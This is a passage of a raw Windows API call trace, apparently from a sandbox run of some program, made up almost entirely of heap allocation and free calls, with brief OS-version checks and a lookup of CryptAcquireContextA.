out: hHeap=0x25c0000) returned 1 [0164.591] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0164.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0164.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.591] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0164.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0164.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.592] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0164.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0164.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0164.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0164.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0164.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.593] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0164.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0164.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0164.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0164.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0164.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0164.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0164.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0164.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.594] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0164.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0164.594] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0164.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0164.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0164.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0164.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0164.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0164.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0164.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0164.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0164.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0164.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.595] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0164.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0164.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.596] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0164.596] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0164.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0164.597] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0164.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0164.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0164.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.597] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0164.598] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0164.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0164.598] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0164.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0164.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.600] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0164.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0164.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0164.602] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0164.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0164.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0164.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0164.602] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0164.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.602] HeapFree (in: hHeap=0x25c0000, 